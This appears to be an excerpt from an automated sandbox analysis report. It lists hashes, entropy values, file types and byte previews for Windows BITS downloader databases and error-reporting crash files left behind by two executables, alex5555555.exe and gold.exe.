MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35901589905449205
Encrypted:	false
SSDEEP:	6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
MD5:	7D48941DB05D2D1C9A0C52739933543F
SHA1:	4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
SHA-256:	C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
SHA-512:	41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
Malicious:	false
Preview:	*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7107366628804119
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqq:2JIB/wUKUKQncEmYRTwh0e
MD5:	D8101B322D17F499571155F947A0CA24
SHA1:	1DEDBB70B0DAFD8E0D47431EA2FE6E46C55A0A61
SHA-256:	7DDCB501F005AA6C5FAB2CD61C96CFA4CD4A6A3BD8827B4B5C1535B63959033D
SHA-512:	6503471554725733A826CC9457201FF5BA1DF7594ECF93C5CF328B6C4F56B67ACCC518863AA7E832F76A1B714656033C84A16706008F5240063C854F061A4C0D
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x5e5d5c2b, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6651404261576322
Encrypted:	false
SSDEEP:	1536:NSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:NazaU+uroc2U5Si6
MD5:	8573FE40136EAAAFC31DDEDAE208D146
SHA1:	F6CA948A524B5B396132B4484500FA5F0CCCA300
SHA-256:	578650EF5133D25675E1854B7657344DD1365E486A3026F8D4A0CF78A6BFDDA5
SHA-512:	11BB63FDAA95C9E3D6D2A19F140B3B2B954D126F58EE519067ED3D5EAAD0C3A4BE2E6FAE0A3AF67741E3DA2E638A477EC0265A9472DFDE2E23AD8572C386630C
Malicious:	false
Preview:	^]\+... .......#.......X\...;...{......................0.e......+...\|..1'...\|..h.b......+...\|..0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................4..A.+...\|...................\.r.+...\|...........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08049084935298498
Encrypted:	false
SSDEEP:	3:IlWetYejCL0Zg5lXQmoAk4t/3mOg95lallkqqG9lXlZOS:GzjS5SU6l5AVr
MD5:	5ED705642410218B1A2F2447E5950FD1
SHA1:	EB3B656F37F294835B567284910A81DD1BF53026
SHA-256:	2537B69B74B39663DAF04933B656EE95FEF238764F01E8FB71DA3810F37E0F6C
SHA-512:	87006764BAEC6634F3CEDC13ABDF5C4E5B122AADA768A980BD28077BDD5E5990A9061763A612F841E8E4CDDBDE175CC3BDA9CDB97D33B21EA6DA9BC1ECF5CB3F
Malicious:	false
Preview:	.W.......................................;...{..1'...\|...+...\|...........+...\|...+...\|..*.y..+...\|g..................\.r.+...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_alex5555555.exe_cce71ab03df258e643ba272e65fa3e2b04eb551_f5cc273e_11956d76-fbba-4fca-b29f-4d2b17a6b33f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7139791027122965
Encrypted:	false
SSDEEP:	192:vYojR7tMB0ve0huTjG1zuiFUZ24IO8y9:VjNtMCve0ojkzuiFUY4IO8e
MD5:	82418637538D5CB01CFB0953CE814F95
SHA1:	FF0EF0454700D10ECCF83D9C7F21D402E27403BE
SHA-256:	130B88E092398292E64DA36F43C3876B09FFA88DB1194417ABBC7BEDBC006B43
SHA-512:	960D8F8CDCE99E110396D3BB712DF217CFDFA00367F9ECC1516EE148D5741C9D88102DCD0C184DA170E28D321A458410DC0D22A34E996BA385772F5B80B3E7FC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.9.4.0.4.2.2.7.3.2.7.1.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.9.4.0.4.2.6.9.0.9.4.0.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.9.5.6.d.7.6.-.f.b.b.a.-.4.f.c.a.-.b.2.9.f.-.4.d.2.b.1.7.a.6.b.3.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.b.7.0.b.8.7.-.7.8.9.4.-.4.0.5.1.-.a.3.c.f.-.e.5.f.a.4.2.a.8.f.0.c.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.l.e.x.5.5.5.5.5.5.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.7.0.-.0.0.0.1.-.0.0.1.4.-.a.7.1.2.-.c.7.7.e.5.4.c.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.c.3.2.9.0.d.5.0.0.3.0.c.8.7.3.c.5.7.2.b.8.f.2.8.7.d.d.2.e.9.0.0.0.0.f.f.f.f.!.0.0.0.0.e.f.9.8.a.9.5.3.f.a.e.4.5.0.6.e.0.4.0.2.d.e.1.5.c.1.f.1.d.9.f.0.b.f.b.4.7.b.0.1.!.a.l.e.x.5.5.5.5.5.5.5...e.x.e.....T.a.r.g.e.t.A.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_gold.exe_21d759a5ab80ebaa4db8463ebaa192b4f6ec389c_0b896d0c_bc4c7750-18ae-4178-ad38-fbcc2f30e2af\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7205027087402895
Encrypted:	false
SSDEEP:	96:T03F5y5tsNhq1oaFyDqGQXIDcQ08c6bcEycw3WLx+HbHg/PB6Heao8Fa9OyWZAXC:TyQtjd0BfYyLmjXqzuiFUZ24IO8xuF
MD5:	402614FCF684DED642FCC7B3484AD833
SHA1:	394601DA7D62886BA638CCBDF597CDFA9F57505F
SHA-256:	00CFC06224B19A5551E99BE20D1CF390226723B7DB33439F5B90B480CD8FDB30
SHA-512:	733538CC2D923674FFA0B43ABF8E4E05446075E221166C08364CB8EA70A3A7112C674BB3DF6C5D0F8330387242499B07C23FB47EC984CAE4BC06E866F6310D93
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.9.4.0.4.0.7.7.3.9.6.9.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.9.4.0.4.0.8.2.7.8.2.7.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.4.c.7.7.5.0.-.1.8.a.e.-.4.1.7.8.-.a.d.3.8.-.f.b.c.c.2.f.3.0.e.2.a.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.b.c.f.2.9.5.-.f.5.a.7.-.4.b.0.3.-.b.f.e.7.-.a.e.f.4.6.4.e.6.3.a.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.o.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.4.8.-.0.0.0.1.-.0.0.1.4.-.2.8.1.2.-.7.c.7.7.5.4.c.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.3.3.1.e.7.2.d.9.2.1.a.b.d.f.1.7.0.5.1.4.a.5.1.f.c.b.a.a.7.a.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.b.4.0.6.c.3.9.f.8.1.f.6.7.e.2.b.2.e.2.6.3.1.3.7.c.7.0.5.9.7.1.8.e.4.a.f.0.0.7.!.g.o.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F12.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81020
Entropy (8bit):	3.067430069084366
Encrypted:	false
SSDEEP:	1536:KleboQ3NB+8bZgcoFh+IcoIa+sn+s0+sDn6+sc+sI4TYH80Y7+s9+sNGjq5iWn0T:KleboQ3NB+8bZgcoFh+pda+O+d+/+V+3
MD5:	14969A140F321D2AE136F95DDB2E72EA
SHA1:	7EE03F4042E0181FFD4247F83B5F919B4711650A
SHA-256:	8EBEE6DB76D408C7A3473DD787BB79BC87FBF6DE09ED8AB7C21DDB48E3475538
SHA-512:	DF65596B99F237DA0818266FA332D3A8B5C5718562EB07A6A1CC903E415F50F91D3F6252FB9FB7D12559049F5E3A8CD478D9E58B3927927C583248F589B273CE
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F51.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6962686771127236
Encrypted:	false
SSDEEP:	96:TiZYWk5lUzAtf3Y7YfeO9H+YEZVTtHiIVXvIwJqzEPaHfxMc/MI+Wo:2ZDkxfMcIzxPaHfxMc/L+Wo
MD5:	2AFF699BEB05624823682DB64788A88A
SHA1:	6B7A8641CA7485C4B81A4DC024EB8040CB75F222
SHA-256:	E54EF16E7161B85DD9A01BFC4CAC455B813AFB8E162EF2B1467807AAB6BF7131
SHA-512:	A62AEE202D3F502107F81FE214FB61B39591A5E41E3AF2B7529BA587CF949CFFFC363933C480D68C8D853D4978005A4DA56E150A11A0C0AD44078607C5ADD7D5
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F79.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jun 27 05:40:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	49266
Entropy (8bit):	1.767210839615161
Encrypted:	false
SSDEEP:	192:iLtBT44d3EO9tw+Ja+r4ee0tJBCVIZd4t0NSRRgGh:Cvd3L9twQJeeJMIZut070
MD5:	E67421EB7B678E58FBCAFCFA9C7D31DD
SHA1:	F3F778E0DD32EAA4D5D81C1BA9E6FCFC436BBDC9
SHA-256:	E33AEB704C9FD572AEFD703D05B9C2F7FDA2F9E684FB8F56F1907E0D1371618C
SHA-512:	AE3A8284327FFCC2C0E371AD554190F63AD6705337F8358A23CCE5C8C4673024146C3FA6A82E882E9DBA879C778F4053E5437913AA71CB721C58604F6837A4D2
Malicious:	false
Preview:	MDMP..a..... .......7.\|f........................0...............V$..........T.......8...........T...........h...............,...........................................................................................eJ..............GenuineIntel............T.......H...6.\|f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5074.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8312
Entropy (8bit):	3.6977093829024335
Encrypted:	false
SSDEEP:	192:R6l7wVeJu1656YaL6/9pSgmfAJ2gprx89bkisfQsm:R6lXJs656YG6/9pSgmfAJ27khfq
MD5:	51ED63AC7ADBB37277CD333498321F17
SHA1:	427C6FA956FB25AA1696B115035A721B66255B62
SHA-256:	121655439414D2B85240EAB239882D00CB0C3A35971E0ABA525D4058C6B04411
SHA-512:	F2C31B054D9E8E26CED01C808EE0EC039E8A1885BB3DB3530301FB2B860CC68C1554D894B8799A1DA22059CBE587385B82C32DA34ABE86DAE46CEC99879FCDF7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5094.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4605
Entropy (8bit):	4.474966730314183
Encrypted:	false
SSDEEP:	48:cvIwWl8zs9rJg77aI9zgWpW8VYq0Ym8M4J5nFHAB+q8i81R8Ffd:uIjf9FI7RZ7V7BJHABw1KFfd
MD5:	F459B9B1A727818FF2ECC99CEED9C171
SHA1:	BE97E20A67716FF2E39BA511E02233FA433729F5
SHA-256:	C497DC955A3ADE5A3A8B54AED4A73A68855971537AB19420454565CC96BF5C92
SHA-512:	762C7B9B23F471F5A8AB6AB6E2684B0E870D09AB9E36DFF5A7F987051D58E0342A1E0FAF0CE56D24D24FBBDF09238036A9007A4B30920308009817E0246DEA34
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="385722" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER50A2.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83686
Entropy (8bit):	3.0595654619304082
Encrypted:	false
SSDEEP:	1536:iVZszbmlIXObUY+4sIIPKVWwSxn99+bZ3M5Ii5/PelVMSxfP8XJDckVAfnTZTLuF:iVZszbmlIXObUY+4sIIPKVWwSxn9EHcn
MD5:	ED2A941CD502FCCA7961E6843DF5F873
SHA1:	90E0B911E1D4F495DD071398338FC9DDBB2F1D18
SHA-256:	C9E91E32106F06122996C2A9A1E0FEAE5BDE342E9A09C39893958D2FEADFC928
SHA-512:	1A170A808F5C157BA05997E98582FA0E98C9996CEA9379E881A08432875447367544D9C8CAD4278C1B2525C5D8D667344971CF2936965B803BB51BE0B9C32855
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5130.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6853782989368082
Encrypted:	false
SSDEEP:	96:TiZYWaL84XYgYzWTHlYEZv7ItHipVWNhwAHJHzayxaM0vbI6l3:2ZDon5CZzayxaM0vU6l3
MD5:	2585BC81CF2BD01C1CD4752627225C13
SHA1:	59495D3D45DD47401D7919904BF38FBC9ADAEC7B
SHA-256:	DDBE3A52FB8F532D35A3C28A0315883AB991E0429AE2DC5B9FDACD8C3A456C4E
SHA-512:	B26AA186E207E3D1E85180AE2ABB6F954C826E5230F8E4C16D579BEC77549CA2319DEB3415F4D5FA926709336D83A985F69B07702A42F70E06BE19DA4C5C160D
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A02.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jun 27 05:40:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	48300
Entropy (8bit):	1.7979095581987412
Encrypted:	false
SSDEEP:	96:5T81VyFv5yndV3PH7uV/UMdi7/FY69ZVV5qfXh0udzfsNgxf+0VfRlVVBWIkWIrI:SPjH+9OcfXhRzfsNgx5vWY2nEi4Gbc
MD5:	6DD797CABC82E6E905AB0AED4ACEED5C
SHA1:	F9AA7C2D7C858C2C5D4639E666DC39678855CD46
SHA-256:	9F56E2D20CAA80B7F8E32970E4DB5E304BA2AEA6B6AC513B743F732F6FB4B146
SHA-512:	97BC472600E37A089A56F6282F89145AD5573AC7D5A6165D2BC873D370B1441D685418CCDD26CD3F4E729165AD32572555708A15E5B1075A4EEF845B7ED12366
Malicious:	false
Preview:	MDMP..a..... .......G.\|f........................X...............T#..........T.......8...........T...........................T...........@...............................................................................eJ..............GenuineIntel............T.......p!..C.\|f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C25.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8346
Entropy (8bit):	3.6999634635729235
Encrypted:	false
SSDEEP:	192:R6l7wVeJ/S6p6Yar6ogmfLJ22prS89bV9sf5Hm:R6lXJq6p6Yu6ogmfLJ2AV2f0
MD5:	7E3F4F1608E603F97864654C8C808FFE
SHA1:	A93A3A2166CEE6AFA41BF8B9745215F4DC00CE61
SHA-256:	7FD799A8B537991062667648BB6746D094B66E9F28DB2731430EB93FF6F10E96
SHA-512:	F0343FF286F9AB87EB4D4CA98EE3D94E1DFDD8F6A5442A4664670B9841BC95D0B775C78D83D75ED41941BB5E43B865211137EED866F2D9E496F73710C7A689A2
Malicious:	false
